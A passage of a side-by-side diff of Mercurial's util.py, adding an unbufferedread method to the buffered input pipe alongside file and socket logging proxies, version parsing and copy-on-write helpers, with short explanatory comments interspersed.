253 253
254 254 def validate(self):
255 255 if self._size != self._got:
256 256 raise error.Abort(_('size mismatch: expected %d, got %d') %
257 257 (self._size, self._got))
258 258 for k, v in self._digests.items():
259 259 if v != self._digester[k]:
260 260 # i18n: first parameter is a digest name
261 261 raise error.Abort(_('%s mismatch: expected %s, got %s') %
262 262 (k, v, self._digester[k]))
263 263
264 264 try:
265 265 buffer = buffer
266 266 except NameError:
267 267 def buffer(sliceable, offset=0, length=None):
268 268 if length is not None:
269 269 return memoryview(sliceable)[offset:offset + length]
270 270 return memoryview(sliceable)[offset:]
271 271
272 272 _chunksize = 4096
273 273
274 274 class bufferedinputpipe(object):
275 275 """a manually buffered input pipe
276 276
277 277 Python will not let us use buffered IO and lazy reading with 'polling' at
278 278 the same time. We cannot probe the buffer state and select will not detect
279 279 that data are ready to read if they are already buffered.
280 280
281 281 This class lets us work around that by implementing its own buffering
282 282 (allowing efficient readline) while offering a way to know if the buffer is
283 283 empty from the output (allowing collaboration of the buffer with polling).
284 284
285 285 This class lives in the 'util' module because it makes use of the 'os'
286 286 module from the python stdlib.
287 287 """
288 288 def __new__(cls, fh):
289 289 # If we receive a fileobjectproxy, we need to use a variation of this
290 290 # class that notifies observers about activity.
291 291 if isinstance(fh, fileobjectproxy):
292 292 cls = observedbufferedinputpipe
293 293
294 294 return super(bufferedinputpipe, cls).__new__(cls)
295 295
296 296 def __init__(self, input):
297 297 self._input = input
298 298 self._buffer = []
299 299 self._eof = False
300 300 self._lenbuf = 0
301 301
302 302 @property
303 303 def hasbuffer(self):
304 304 """True is any data is currently buffered
305 305
306 306 This will be used externally as a pre-step for polling IO. If there is
307 307 already data, then no polling should be set in place."""
308 308 return bool(self._buffer)
309 309
310 310 @property
311 311 def closed(self):
312 312 return self._input.closed
313 313
314 314 def fileno(self):
315 315 return self._input.fileno()
316 316
317 317 def close(self):
318 318 return self._input.close()
319 319
320 320 def read(self, size):
321 321 while (not self._eof) and (self._lenbuf < size):
322 322 self._fillbuffer()
323 323 return self._frombuffer(size)
324 324
325 def unbufferedread(self, size):
326 if not self._eof and self._lenbuf == 0:
327 self._fillbuffer(max(size, _chunksize))
328 return self._frombuffer(min(self._lenbuf, size))
329
325 330 def readline(self, *args, **kwargs):
326 331 if 1 < len(self._buffer):
327 332 # this should not happen because both read and readline end with a
328 333 # _frombuffer call that collapses it.
329 334 self._buffer = [''.join(self._buffer)]
330 335 self._lenbuf = len(self._buffer[0])
331 336 lfi = -1
332 337 if self._buffer:
333 338 lfi = self._buffer[-1].find('\n')
334 339 while (not self._eof) and lfi < 0:
335 340 self._fillbuffer()
336 341 if self._buffer:
337 342 lfi = self._buffer[-1].find('\n')
338 343 size = lfi + 1
339 344 if lfi < 0: # end of file
340 345 size = self._lenbuf
341 346 elif 1 < len(self._buffer):
342 347 # we need to take previous chunks into account
343 348 size += self._lenbuf - len(self._buffer[-1])
344 349 return self._frombuffer(size)
345 350
346 351 def _frombuffer(self, size):
347 352 """return at most 'size' data from the buffer
348 353
349 354 The data are removed from the buffer."""
350 355 if size == 0 or not self._buffer:
351 356 return ''
352 357 buf = self._buffer[0]
353 358 if 1 < len(self._buffer):
354 359 buf = ''.join(self._buffer)
355 360
356 361 data = buf[:size]
357 362 buf = buf[len(data):]
358 363 if buf:
359 364 self._buffer = [buf]
360 365 self._lenbuf = len(buf)
361 366 else:
362 367 self._buffer = []
363 368 self._lenbuf = 0
364 369 return data
365 370
366 def _fillbuffer(self):
371 def _fillbuffer(self, size=_chunksize):
367 372 """read data to the buffer"""
368 data = os.read(self._input.fileno(), _chunksize)
373 data = os.read(self._input.fileno(), size)
369 374 if not data:
370 375 self._eof = True
371 376 else:
372 377 self._lenbuf += len(data)
373 378 self._buffer.append(data)
374 379
375 380 return data
376 381
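
The distinction that motivates this change: read() keeps refilling the buffer until it holds ``size`` bytes or EOF is reached, which can block on data the server will never send (for example, when a decompressor speculatively asks for more bytes than the stream holds), whereas unbufferedread() performs at most one os.read() and returns whatever arrived. A sketch, assuming ``p = bufferedinputpipe(fh)``:

    # p.read(65536)            # may block: loops on _fillbuffer() until
    #                          # 65536 bytes are buffered or EOF is seen
    # p.unbufferedread(65536)  # returns promptly: a single _fillbuffer(
    #                          # max(size, _chunksize)), then whatever is there
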
377 382 def mmapread(fp):
378 383 try:
379 384 fd = getattr(fp, 'fileno', lambda: fp)()
380 385 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
381 386 except ValueError:
382 387 # Empty files cannot be mmapped, but mmapread should still work. Check
383 388 # if the file is empty, and if so, return an empty buffer.
384 389 if os.fstat(fd).st_size == 0:
385 390 return ''
386 391 raise
387 392
388 393 class fileobjectproxy(object):
389 394 """A proxy around file objects that tells a watcher when events occur.
390 395
391 396 This type is intended to only be used for testing purposes. Think hard
392 397 before using it in important code.
393 398 """
394 399 __slots__ = (
395 400 r'_orig',
396 401 r'_observer',
397 402 )
398 403
399 404 def __init__(self, fh, observer):
400 405 object.__setattr__(self, r'_orig', fh)
401 406 object.__setattr__(self, r'_observer', observer)
402 407
403 408 def __getattribute__(self, name):
404 409 ours = {
405 410 r'_observer',
406 411
407 412 # IOBase
408 413 r'close',
409 414 # closed is a property
410 415 r'fileno',
411 416 r'flush',
412 417 r'isatty',
413 418 r'readable',
414 419 r'readline',
415 420 r'readlines',
416 421 r'seek',
417 422 r'seekable',
418 423 r'tell',
419 424 r'truncate',
420 425 r'writable',
421 426 r'writelines',
422 427 # RawIOBase
423 428 r'read',
424 429 r'readall',
425 430 r'readinto',
426 431 r'write',
427 432 # BufferedIOBase
428 433 # raw is a property
429 434 r'detach',
430 435 # read defined above
431 436 r'read1',
432 437 # readinto defined above
433 438 # write defined above
434 439 }
435 440
436 441 # We only observe some methods.
437 442 if name in ours:
438 443 return object.__getattribute__(self, name)
439 444
440 445 return getattr(object.__getattribute__(self, r'_orig'), name)
441 446
442 447 def __nonzero__(self):
443 448 return bool(object.__getattribute__(self, r'_orig'))
444 449
445 450 __bool__ = __nonzero__
446 451
447 452 def __delattr__(self, name):
448 453 return delattr(object.__getattribute__(self, r'_orig'), name)
449 454
450 455 def __setattr__(self, name, value):
451 456 return setattr(object.__getattribute__(self, r'_orig'), name, value)
452 457
453 458 def __iter__(self):
454 459 return object.__getattribute__(self, r'_orig').__iter__()
455 460
456 461 def _observedcall(self, name, *args, **kwargs):
457 462 # Call the original object.
458 463 orig = object.__getattribute__(self, r'_orig')
459 464 res = getattr(orig, name)(*args, **kwargs)
460 465
461 466 # Call a method on the observer of the same name with arguments
462 467 # so it can react, log, etc.
463 468 observer = object.__getattribute__(self, r'_observer')
464 469 fn = getattr(observer, name, None)
465 470 if fn:
466 471 fn(res, *args, **kwargs)
467 472
468 473 return res
469 474
470 475 def close(self, *args, **kwargs):
471 476 return object.__getattribute__(self, r'_observedcall')(
472 477 r'close', *args, **kwargs)
473 478
474 479 def fileno(self, *args, **kwargs):
475 480 return object.__getattribute__(self, r'_observedcall')(
476 481 r'fileno', *args, **kwargs)
477 482
478 483 def flush(self, *args, **kwargs):
479 484 return object.__getattribute__(self, r'_observedcall')(
480 485 r'flush', *args, **kwargs)
481 486
482 487 def isatty(self, *args, **kwargs):
483 488 return object.__getattribute__(self, r'_observedcall')(
484 489 r'isatty', *args, **kwargs)
485 490
486 491 def readable(self, *args, **kwargs):
487 492 return object.__getattribute__(self, r'_observedcall')(
488 493 r'readable', *args, **kwargs)
489 494
490 495 def readline(self, *args, **kwargs):
491 496 return object.__getattribute__(self, r'_observedcall')(
492 497 r'readline', *args, **kwargs)
493 498
494 499 def readlines(self, *args, **kwargs):
495 500 return object.__getattribute__(self, r'_observedcall')(
496 501 r'readlines', *args, **kwargs)
497 502
498 503 def seek(self, *args, **kwargs):
499 504 return object.__getattribute__(self, r'_observedcall')(
500 505 r'seek', *args, **kwargs)
501 506
502 507 def seekable(self, *args, **kwargs):
503 508 return object.__getattribute__(self, r'_observedcall')(
504 509 r'seekable', *args, **kwargs)
505 510
506 511 def tell(self, *args, **kwargs):
507 512 return object.__getattribute__(self, r'_observedcall')(
508 513 r'tell', *args, **kwargs)
509 514
510 515 def truncate(self, *args, **kwargs):
511 516 return object.__getattribute__(self, r'_observedcall')(
512 517 r'truncate', *args, **kwargs)
513 518
514 519 def writable(self, *args, **kwargs):
515 520 return object.__getattribute__(self, r'_observedcall')(
516 521 r'writable', *args, **kwargs)
517 522
518 523 def writelines(self, *args, **kwargs):
519 524 return object.__getattribute__(self, r'_observedcall')(
520 525 r'writelines', *args, **kwargs)
521 526
522 527 def read(self, *args, **kwargs):
523 528 return object.__getattribute__(self, r'_observedcall')(
524 529 r'read', *args, **kwargs)
525 530
526 531 def readall(self, *args, **kwargs):
527 532 return object.__getattribute__(self, r'_observedcall')(
528 533 r'readall', *args, **kwargs)
529 534
530 535 def readinto(self, *args, **kwargs):
531 536 return object.__getattribute__(self, r'_observedcall')(
532 537 r'readinto', *args, **kwargs)
533 538
534 539 def write(self, *args, **kwargs):
535 540 return object.__getattribute__(self, r'_observedcall')(
536 541 r'write', *args, **kwargs)
537 542
538 543 def detach(self, *args, **kwargs):
539 544 return object.__getattribute__(self, r'_observedcall')(
540 545 r'detach', *args, **kwargs)
541 546
542 547 def read1(self, *args, **kwargs):
543 548 return object.__getattribute__(self, r'_observedcall')(
544 549 r'read1', *args, **kwargs)
545 550
546 551 class observedbufferedinputpipe(bufferedinputpipe):
547 552 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
548 553
549 554 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
550 555 bypass ``fileobjectproxy``. Because of this, we need to make
551 556 ``bufferedinputpipe`` aware of these operations.
552 557
553 558 This variation of ``bufferedinputpipe`` can notify observers about
554 559 ``os.read()`` events. It also re-publishes other events, such as
555 560 ``read()`` and ``readline()``.
556 561 """
557 562 def _fillbuffer(self, size=_chunksize):
558 563 res = super(observedbufferedinputpipe, self)._fillbuffer(size)
559 564
560 565 fn = getattr(self._input._observer, r'osread', None)
561 566 if fn:
562 567 fn(res, size)
563 568
564 569 return res
565 570
566 571 # We use different observer methods because the operation isn't
567 572 # performed on the actual file object but on us.
568 573 def read(self, size):
569 574 res = super(observedbufferedinputpipe, self).read(size)
570 575
571 576 fn = getattr(self._input._observer, r'bufferedread', None)
572 577 if fn:
573 578 fn(res, size)
574 579
575 580 return res
576 581
577 582 def readline(self, *args, **kwargs):
578 583 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
579 584
580 585 fn = getattr(self._input._observer, r'bufferedreadline', None)
581 586 if fn:
582 587 fn(res)
583 588
584 589 return res
585 590
586 591 PROXIED_SOCKET_METHODS = {
587 592 r'makefile',
588 593 r'recv',
589 594 r'recvfrom',
590 595 r'recvfrom_into',
591 596 r'recv_into',
592 597 r'send',
593 598 r'sendall',
594 599 r'sendto',
595 600 r'setblocking',
596 601 r'settimeout',
597 602 r'gettimeout',
598 603 r'setsockopt',
599 604 }
600 605
601 606 class socketproxy(object):
602 607 """A proxy around a socket that tells a watcher when events occur.
603 608
604 609 This is like ``fileobjectproxy`` except for sockets.
605 610
606 611 This type is intended to only be used for testing purposes. Think hard
607 612 before using it in important code.
608 613 """
609 614 __slots__ = (
610 615 r'_orig',
611 616 r'_observer',
612 617 )
613 618
614 619 def __init__(self, sock, observer):
615 620 object.__setattr__(self, r'_orig', sock)
616 621 object.__setattr__(self, r'_observer', observer)
617 622
618 623 def __getattribute__(self, name):
619 624 if name in PROXIED_SOCKET_METHODS:
620 625 return object.__getattribute__(self, name)
621 626
622 627 return getattr(object.__getattribute__(self, r'_orig'), name)
623 628
624 629 def __delattr__(self, name):
625 630 return delattr(object.__getattribute__(self, r'_orig'), name)
626 631
627 632 def __setattr__(self, name, value):
628 633 return setattr(object.__getattribute__(self, r'_orig'), name, value)
629 634
630 635 def __nonzero__(self):
631 636 return bool(object.__getattribute__(self, r'_orig'))
632 637
633 638 __bool__ = __nonzero__
634 639
635 640 def _observedcall(self, name, *args, **kwargs):
636 641 # Call the original object.
637 642 orig = object.__getattribute__(self, r'_orig')
638 643 res = getattr(orig, name)(*args, **kwargs)
639 644
640 645 # Call a method on the observer of the same name with arguments
641 646 # so it can react, log, etc.
642 647 observer = object.__getattribute__(self, r'_observer')
643 648 fn = getattr(observer, name, None)
644 649 if fn:
645 650 fn(res, *args, **kwargs)
646 651
647 652 return res
648 653
649 654 def makefile(self, *args, **kwargs):
650 655 res = object.__getattribute__(self, r'_observedcall')(
651 656 r'makefile', *args, **kwargs)
652 657
653 658 # The file object may be used for I/O. So we turn it into a
654 659 # proxy using our observer.
655 660 observer = object.__getattribute__(self, r'_observer')
656 661 return makeloggingfileobject(observer.fh, res, observer.name,
657 662 reads=observer.reads,
658 663 writes=observer.writes,
659 664 logdata=observer.logdata,
660 665 logdataapis=observer.logdataapis)
661 666
662 667 def recv(self, *args, **kwargs):
663 668 return object.__getattribute__(self, r'_observedcall')(
664 669 r'recv', *args, **kwargs)
665 670
666 671 def recvfrom(self, *args, **kwargs):
667 672 return object.__getattribute__(self, r'_observedcall')(
668 673 r'recvfrom', *args, **kwargs)
669 674
670 675 def recvfrom_into(self, *args, **kwargs):
671 676 return object.__getattribute__(self, r'_observedcall')(
672 677 r'recvfrom_into', *args, **kwargs)
673 678
674 679 def recv_into(self, *args, **kwargs):
675 680 return object.__getattribute__(self, r'_observedcall')(
676 681 r'recv_into', *args, **kwargs)
677 682
678 683 def send(self, *args, **kwargs):
679 684 return object.__getattribute__(self, r'_observedcall')(
680 685 r'send', *args, **kwargs)
681 686
682 687 def sendall(self, *args, **kwargs):
683 688 return object.__getattribute__(self, r'_observedcall')(
684 689 r'sendall', *args, **kwargs)
685 690
686 691 def sendto(self, *args, **kwargs):
687 692 return object.__getattribute__(self, r'_observedcall')(
688 693 r'sendto', *args, **kwargs)
689 694
690 695 def setblocking(self, *args, **kwargs):
691 696 return object.__getattribute__(self, r'_observedcall')(
692 697 r'setblocking', *args, **kwargs)
693 698
694 699 def settimeout(self, *args, **kwargs):
695 700 return object.__getattribute__(self, r'_observedcall')(
696 701 r'settimeout', *args, **kwargs)
697 702
698 703 def gettimeout(self, *args, **kwargs):
699 704 return object.__getattribute__(self, r'_observedcall')(
700 705 r'gettimeout', *args, **kwargs)
701 706
702 707 def setsockopt(self, *args, **kwargs):
703 708 return object.__getattribute__(self, r'_observedcall')(
704 709 r'setsockopt', *args, **kwargs)
705 710
706 711 class baseproxyobserver(object):
707 712 def _writedata(self, data):
708 713 if not self.logdata:
709 714 if self.logdataapis:
710 715 self.fh.write('\n')
711 716 self.fh.flush()
712 717 return
713 718
714 719 # Simple case writes all data on a single line.
715 720 if b'\n' not in data:
716 721 if self.logdataapis:
717 722 self.fh.write(': %s\n' % stringutil.escapestr(data))
718 723 else:
719 724 self.fh.write('%s> %s\n'
720 725 % (self.name, stringutil.escapestr(data)))
721 726 self.fh.flush()
722 727 return
723 728
724 729 # Data with newlines is written to multiple lines.
725 730 if self.logdataapis:
726 731 self.fh.write(':\n')
727 732
728 733 lines = data.splitlines(True)
729 734 for line in lines:
730 735 self.fh.write('%s> %s\n'
731 736 % (self.name, stringutil.escapestr(line)))
732 737 self.fh.flush()
733 738
734 739 class fileobjectobserver(baseproxyobserver):
735 740 """Logs file object activity."""
736 741 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
737 742 logdataapis=True):
738 743 self.fh = fh
739 744 self.name = name
740 745 self.logdata = logdata
741 746 self.logdataapis = logdataapis
742 747 self.reads = reads
743 748 self.writes = writes
744 749
745 750 def read(self, res, size=-1):
746 751 if not self.reads:
747 752 return
748 753 # Python 3 can return None from reads at EOF instead of empty strings.
749 754 if res is None:
750 755 res = ''
751 756
752 757 if size == -1 and res == '':
753 758 # Suppress pointless read(-1) calls that return
754 759 # nothing. These happen _a lot_ on Python 3, and there
755 760 # doesn't seem to be a better workaround to have matching
756 761 # Python 2 and 3 behavior. :(
757 762 return
758 763
759 764 if self.logdataapis:
760 765 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
761 766
762 767 self._writedata(res)
763 768
764 769 def readline(self, res, limit=-1):
765 770 if not self.reads:
766 771 return
767 772
768 773 if self.logdataapis:
769 774 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
770 775
771 776 self._writedata(res)
772 777
773 778 def readinto(self, res, dest):
774 779 if not self.reads:
775 780 return
776 781
777 782 if self.logdataapis:
778 783 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
779 784 res))
780 785
781 786 data = dest[0:res] if res is not None else b''
782 787 self._writedata(data)
783 788
784 789 def write(self, res, data):
785 790 if not self.writes:
786 791 return
787 792
788 793 # Python 2 returns None from some write() calls. Python 3 (reasonably)
789 794 # returns the integer bytes written.
790 795 if res is None and data:
791 796 res = len(data)
792 797
793 798 if self.logdataapis:
794 799 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
795 800
796 801 self._writedata(data)
797 802
798 803 def flush(self, res):
799 804 if not self.writes:
800 805 return
801 806
802 807 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
803 808
804 809 # For observedbufferedinputpipe.
805 810 def bufferedread(self, res, size):
806 811 if not self.reads:
807 812 return
808 813
809 814 if self.logdataapis:
810 815 self.fh.write('%s> bufferedread(%d) -> %d' % (
811 816 self.name, size, len(res)))
812 817
813 818 self._writedata(res)
814 819
815 820 def bufferedreadline(self, res):
816 821 if not self.reads:
817 822 return
818 823
819 824 if self.logdataapis:
820 825 self.fh.write('%s> bufferedreadline() -> %d' % (
821 826 self.name, len(res)))
822 827
823 828 self._writedata(res)
824 829
825 830 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
826 831 logdata=False, logdataapis=True):
827 832 """Turn a file object into a logging file object."""
828 833
829 834 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
830 835 logdata=logdata, logdataapis=logdataapis)
831 836 return fileobjectproxy(fh, observer)
832 837
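
A small usage sketch for the logging wrapper (the log destination and wrapped handle are hypothetical):

    logfh = open('/tmp/io.log', 'wb')   # hypothetical log sink
    fh = makeloggingfileobject(logfh, realfh, b'pipe',
                               logdata=True, logdataapis=True)
    fh.read(10)   # logs roughly: pipe> read(10) -> 10: <escaped data>
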
833 838 class socketobserver(baseproxyobserver):
834 839 """Logs socket activity."""
835 840 def __init__(self, fh, name, reads=True, writes=True, states=True,
836 841 logdata=False, logdataapis=True):
837 842 self.fh = fh
838 843 self.name = name
839 844 self.reads = reads
840 845 self.writes = writes
841 846 self.states = states
842 847 self.logdata = logdata
843 848 self.logdataapis = logdataapis
844 849
845 850 def makefile(self, res, mode=None, bufsize=None):
846 851 if not self.states:
847 852 return
848 853
849 854 self.fh.write('%s> makefile(%r, %r)\n' % (
850 855 self.name, mode, bufsize))
851 856
852 857 def recv(self, res, size, flags=0):
853 858 if not self.reads:
854 859 return
855 860
856 861 if self.logdataapis:
857 862 self.fh.write('%s> recv(%d, %d) -> %d' % (
858 863 self.name, size, flags, len(res)))
859 864 self._writedata(res)
860 865
861 866 def recvfrom(self, res, size, flags=0):
862 867 if not self.reads:
863 868 return
864 869
865 870 if self.logdataapis:
866 871 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
867 872 self.name, size, flags, len(res[0])))
868 873
869 874 self._writedata(res[0])
870 875
871 876 def recvfrom_into(self, res, buf, size, flags=0):
872 877 if not self.reads:
873 878 return
874 879
875 880 if self.logdataapis:
876 881 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
877 882 self.name, size, flags, res[0]))
878 883
879 884 self._writedata(buf[0:res[0]])
880 885
881 886 def recv_into(self, res, buf, size=0, flags=0):
882 887 if not self.reads:
883 888 return
884 889
885 890 if self.logdataapis:
886 891 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
887 892 self.name, size, flags, res))
888 893
889 894 self._writedata(buf[0:res])
890 895
891 896 def send(self, res, data, flags=0):
892 897 if not self.writes:
893 898 return
894 899
895 900 self.fh.write('%s> send(%d, %d) -> %d' % (
896 901 self.name, len(data), flags, len(res)))
897 902 self._writedata(data)
898 903
899 904 def sendall(self, res, data, flags=0):
900 905 if not self.writes:
901 906 return
902 907
903 908 if self.logdataapis:
904 909 # Returns None on success. So don't bother reporting return value.
905 910 self.fh.write('%s> sendall(%d, %d)' % (
906 911 self.name, len(data), flags))
907 912
908 913 self._writedata(data)
909 914
910 915 def sendto(self, res, data, flagsoraddress, address=None):
911 916 if not self.writes:
912 917 return
913 918
914 919 if address:
915 920 flags = flagsoraddress
916 921 else:
917 922 flags = 0
918 923
919 924 if self.logdataapis:
920 925 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
921 926 self.name, len(data), flags, address, res))
922 927
923 928 self._writedata(data)
924 929
925 930 def setblocking(self, res, flag):
926 931 if not self.states:
927 932 return
928 933
929 934 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
930 935
931 936 def settimeout(self, res, value):
932 937 if not self.states:
933 938 return
934 939
935 940 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
936 941
937 942 def gettimeout(self, res):
938 943 if not self.states:
939 944 return
940 945
941 946 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
942 947
943 948 def setsockopt(self, res, level, optname, value):
944 949 if not self.states:
945 950 return
946 951
947 952 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
948 953 self.name, level, optname, value, res))
949 954
950 955 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
951 956 logdata=False, logdataapis=True):
952 957 """Turn a socket into a logging socket."""
953 958
954 959 observer = socketobserver(logh, name, reads=reads, writes=writes,
955 960 states=states, logdata=logdata,
956 961 logdataapis=logdataapis)
957 962 return socketproxy(fh, observer)
958 963
959 964 def version():
960 965 """Return version information if available."""
961 966 try:
962 967 from . import __version__
963 968 return __version__.version
964 969 except ImportError:
965 970 return 'unknown'
966 971
967 972 def versiontuple(v=None, n=4):
968 973 """Parses a Mercurial version string into an N-tuple.
969 974
970 975 The version string to be parsed is specified with the ``v`` argument.
971 976 If it isn't defined, the current Mercurial version string will be parsed.
972 977
973 978 ``n`` can be 2, 3, or 4. Here is how some version strings map to
974 979 returned values:
975 980
976 981 >>> v = b'3.6.1+190-df9b73d2d444'
977 982 >>> versiontuple(v, 2)
978 983 (3, 6)
979 984 >>> versiontuple(v, 3)
980 985 (3, 6, 1)
981 986 >>> versiontuple(v, 4)
982 987 (3, 6, 1, '190-df9b73d2d444')
983 988
984 989 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
985 990 (3, 6, 1, '190-df9b73d2d444+20151118')
986 991
987 992 >>> v = b'3.6'
988 993 >>> versiontuple(v, 2)
989 994 (3, 6)
990 995 >>> versiontuple(v, 3)
991 996 (3, 6, None)
992 997 >>> versiontuple(v, 4)
993 998 (3, 6, None, None)
994 999
995 1000 >>> v = b'3.9-rc'
996 1001 >>> versiontuple(v, 2)
997 1002 (3, 9)
998 1003 >>> versiontuple(v, 3)
999 1004 (3, 9, None)
1000 1005 >>> versiontuple(v, 4)
1001 1006 (3, 9, None, 'rc')
1002 1007
1003 1008 >>> v = b'3.9-rc+2-02a8fea4289b'
1004 1009 >>> versiontuple(v, 2)
1005 1010 (3, 9)
1006 1011 >>> versiontuple(v, 3)
1007 1012 (3, 9, None)
1008 1013 >>> versiontuple(v, 4)
1009 1014 (3, 9, None, 'rc+2-02a8fea4289b')
1010 1015
1011 1016 >>> versiontuple(b'4.6rc0')
1012 1017 (4, 6, None, 'rc0')
1013 1018 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1014 1019 (4, 6, None, 'rc0+12-425d55e54f98')
1015 1020 >>> versiontuple(b'.1.2.3')
1016 1021 (None, None, None, '.1.2.3')
1017 1022 >>> versiontuple(b'12.34..5')
1018 1023 (12, 34, None, '..5')
1019 1024 >>> versiontuple(b'1.2.3.4.5.6')
1020 1025 (1, 2, 3, '.4.5.6')
1021 1026 """
1022 1027 if not v:
1023 1028 v = version()
1024 1029 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1025 1030 if not m:
1026 1031 vparts, extra = '', v
1027 1032 elif m.group(2):
1028 1033 vparts, extra = m.groups()
1029 1034 else:
1030 1035 vparts, extra = m.group(1), None
1031 1036
1032 1037 vints = []
1033 1038 for i in vparts.split('.'):
1034 1039 try:
1035 1040 vints.append(int(i))
1036 1041 except ValueError:
1037 1042 break
1038 1043 # (3, 6) -> (3, 6, None)
1039 1044 while len(vints) < 3:
1040 1045 vints.append(None)
1041 1046
1042 1047 if n == 2:
1043 1048 return (vints[0], vints[1])
1044 1049 if n == 3:
1045 1050 return (vints[0], vints[1], vints[2])
1046 1051 if n == 4:
1047 1052 return (vints[0], vints[1], vints[2], extra)
1048 1053
1049 1054 def cachefunc(func):
1050 1055 '''cache the result of function calls'''
1051 1056 # XXX doesn't handle keywords args
1052 1057 if func.__code__.co_argcount == 0:
1053 1058 cache = []
1054 1059 def f():
1055 1060 if len(cache) == 0:
1056 1061 cache.append(func())
1057 1062 return cache[0]
1058 1063 return f
1059 1064 cache = {}
1060 1065 if func.__code__.co_argcount == 1:
1061 1066 # we gain a small amount of time because
1062 1067 # we don't need to pack/unpack the list
1063 1068 def f(arg):
1064 1069 if arg not in cache:
1065 1070 cache[arg] = func(arg)
1066 1071 return cache[arg]
1067 1072 else:
1068 1073 def f(*args):
1069 1074 if args not in cache:
1070 1075 cache[args] = func(*args)
1071 1076 return cache[args]
1072 1077
1073 1078 return f
1074 1079
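# Usage sketch (illustrative; ``square`` and ``calls`` are hypothetical
# names): repeated calls with the same argument are served from the cache,
# so the wrapped function body runs only once per distinct argument.
#
#   >>> calls = []
#   >>> @cachefunc
#   ... def square(x):
#   ...     calls.append(x)
#   ...     return x * x
#   >>> square(3), square(3)
#   (9, 9)
#   >>> calls
#   [3]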
1075 1080 class cow(object):
1076 1081 """helper class to make copy-on-write easier
1077 1082
1078 1083 Call preparewrite before doing any writes.
1079 1084 """
1080 1085
1081 1086 def preparewrite(self):
1082 1087 """call this before writes, return self or a copied new object"""
1083 1088 if getattr(self, '_copied', 0):
1084 1089 self._copied -= 1
1085 1090 return self.__class__(self)
1086 1091 return self
1087 1092
1088 1093 def copy(self):
1089 1094 """always do a cheap copy"""
1090 1095 self._copied = getattr(self, '_copied', 0) + 1
1091 1096 return self
1092 1097
1093 1098 class sortdict(collections.OrderedDict):
1094 1099 '''a simple sorted dictionary
1095 1100
1096 1101 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1097 1102 >>> d2 = d1.copy()
1098 1103 >>> d2
1099 1104 sortdict([('a', 0), ('b', 1)])
1100 1105 >>> d2.update([(b'a', 2)])
1101 1106 >>> list(d2.keys()) # should still be in last-set order
1102 1107 ['b', 'a']
1103 1108 '''
1104 1109
1105 1110 def __setitem__(self, key, value):
1106 1111 if key in self:
1107 1112 del self[key]
1108 1113 super(sortdict, self).__setitem__(key, value)
1109 1114
1110 1115 if pycompat.ispypy:
1111 1116 # __setitem__() isn't called as of PyPy 5.8.0
1112 1117 def update(self, src):
1113 1118 if isinstance(src, dict):
1114 1119 src = src.iteritems()
1115 1120 for k, v in src:
1116 1121 self[k] = v
1117 1122
1118 1123 class cowdict(cow, dict):
1119 1124 """copy-on-write dict
1120 1125
1121 1126 Be sure to call d = d.preparewrite() before writing to d.
1122 1127
1123 1128 >>> a = cowdict()
1124 1129 >>> a is a.preparewrite()
1125 1130 True
1126 1131 >>> b = a.copy()
1127 1132 >>> b is a
1128 1133 True
1129 1134 >>> c = b.copy()
1130 1135 >>> c is a
1131 1136 True
1132 1137 >>> a = a.preparewrite()
1133 1138 >>> b is a
1134 1139 False
1135 1140 >>> a is a.preparewrite()
1136 1141 True
1137 1142 >>> c = c.preparewrite()
1138 1143 >>> b is c
1139 1144 False
1140 1145 >>> b is b.preparewrite()
1141 1146 True
1142 1147 """
1143 1148
1144 1149 class cowsortdict(cow, sortdict):
1145 1150 """copy-on-write sortdict
1146 1151
1147 1152 Be sure to call d = d.preparewrite() before writing to d.
1148 1153 """
1149 1154
1150 1155 class transactional(object):
1151 1156 """Base class for making a transactional type into a context manager."""
1152 1157 __metaclass__ = abc.ABCMeta
1153 1158
1154 1159 @abc.abstractmethod
1155 1160 def close(self):
1156 1161 """Successfully closes the transaction."""
1157 1162
1158 1163 @abc.abstractmethod
1159 1164 def release(self):
1160 1165 """Marks the end of the transaction.
1161 1166
1162 1167 If the transaction has not been closed, it will be aborted.
1163 1168 """
1164 1169
1165 1170 def __enter__(self):
1166 1171 return self
1167 1172
1168 1173 def __exit__(self, exc_type, exc_val, exc_tb):
1169 1174 try:
1170 1175 if exc_type is None:
1171 1176 self.close()
1172 1177 finally:
1173 1178 self.release()
1174 1179
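# A minimal sketch of a transactional subclass (hypothetical class): the
# context manager form calls close() only on a clean exit and release() in
# every case, so an exception inside the block aborts the transaction.
#
#   class demotransaction(transactional):
#       def __init__(self):
#           self.closed = self.released = False
#       def close(self):
#           self.closed = True
#       def release(self):
#           self.released = True
#
#   with demotransaction() as tr:
#       pass                  # clean exit: close() runs, then release()
#   assert tr.closed and tr.released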
1175 1180 @contextlib.contextmanager
1176 1181 def acceptintervention(tr=None):
1177 1182 """A context manager that closes the transaction on InterventionRequired
1178 1183
1179 1184 If no transaction was provided, this simply runs the body and returns
1180 1185 """
1181 1186 if not tr:
1182 1187 yield
1183 1188 return
1184 1189 try:
1185 1190 yield
1186 1191 tr.close()
1187 1192 except error.InterventionRequired:
1188 1193 tr.close()
1189 1194 raise
1190 1195 finally:
1191 1196 tr.release()
1192 1197
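# Usage sketch (``tr`` and the body are hypothetical): unlike a plain
# transaction context, InterventionRequired closes the transaction instead
# of aborting it, so the work done so far is kept for the user to resume.
#
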